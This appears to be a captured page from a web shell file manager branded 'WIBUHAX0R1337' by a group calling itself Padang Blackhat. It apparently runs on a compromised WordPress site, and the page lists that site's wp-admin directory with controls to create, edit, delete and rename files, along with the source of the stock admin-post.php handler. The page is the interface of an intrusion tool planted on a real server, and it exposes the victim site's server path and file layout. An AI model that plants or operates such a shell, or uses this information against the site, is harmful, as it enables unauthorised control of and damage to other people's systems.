-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
xtrasolutionsco.com
/
wp-admin
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
css
--
NONE
images
--
NONE
includes
--
NONE
js
--
NONE
maint
--
NONE
network
--
NONE
user
--
NONE
.htaccess
0.192KB
Edit File
Delete File
Rename
admin-post.php
1.974KB
Edit File
Delete File
Rename
comment.php
11.35KB
Edit File
Delete File
Rename
contribute.php
5.593KB
Edit File
Delete File
Rename
credits.php
4.113KB
Edit File
Delete File
Rename
edit-tag-form.php
10.438KB
Edit File
Delete File
Rename
edit-tags.php
22.005KB
Edit File
Delete File
Rename
error_log
23.926KB
Edit File
Delete File
Rename
export-personal-data.php
7.755KB
Edit File
Delete File
Rename
export.php
11.023KB
Edit File
Delete File
Rename
import.php
7.584KB
Edit File
Delete File
Rename
install.php
17.943KB
Edit File
Delete File
Rename
link-manager.php
4.259KB
Edit File
Delete File
Rename
load-styles.php
2.925KB
Edit File
Delete File
Rename
media-upload.php
3.582KB
Edit File
Delete File
Rename
menu.php
16.967KB
Edit File
Delete File
Rename
ms-delete-site.php
4.193KB
Edit File
Delete File
Rename
ms-sites.php
0.21KB
Edit File
Delete File
Rename
network.php
5.393KB
Edit File
Delete File
Rename
options-reading.php
10.025KB
Edit File
Delete File
Rename
revision.php
5.714KB
Edit File
Delete File
Rename
theme-install.php
23.365KB
Edit File
Delete File
Rename
themes.php
48.121KB
Edit File
Delete File
Rename
update.php
12.785KB
Edit File
Delete File
Rename
upgrade.php
6.325KB
Edit File
Delete File
Rename
users.php
23.279KB
Edit File
Delete File
Rename
<?php /** * WordPress Generic Request (POST/GET) Handler * * Intended for form submission handling in themes and plugins. * * @package WordPress * @subpackage Administration */ /** We are located in WordPress Administration Screens */ if ( ! defined( 'WP_ADMIN' ) ) { define( 'WP_ADMIN', true ); } /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; /** Allow for cross-domain requests (from the front end). */ send_origin_headers(); require_once ABSPATH . 'wp-admin/includes/admin.php'; nocache_headers(); /** This action is documented in wp-admin/admin.php */ do_action( 'admin_init' ); $action = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : ''; // Reject invalid parameters. if ( ! is_scalar( $action ) ) { wp_die( '', 400 ); } if ( ! is_user_logged_in() ) { if ( empty( $action ) ) { /** * Fires on a non-authenticated admin post request where no action is supplied. * * @since 2.6.0 */ do_action( 'admin_post_nopriv' ); } else { // If no action is registered, return a Bad Request response. if ( ! has_action( "admin_post_nopriv_{$action}" ) ) { wp_die( '', 400 ); } /** * Fires on a non-authenticated admin post request for the given action. * * The dynamic portion of the hook name, `$action`, refers to the given * request action. * * @since 2.6.0 */ do_action( "admin_post_nopriv_{$action}" ); } } else { if ( empty( $action ) ) { /** * Fires on an authenticated admin post request where no action is supplied. * * @since 2.6.0 */ do_action( 'admin_post' ); } else { // If no action is registered, return a Bad Request response. if ( ! has_action( "admin_post_{$action}" ) ) { wp_die( '', 400 ); } /** * Fires on an authenticated admin post request for the given action. * * The dynamic portion of the hook name, `$action`, refers to the given * request action. * * @since 2.6.0 */ do_action( "admin_post_{$action}" ); } }
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat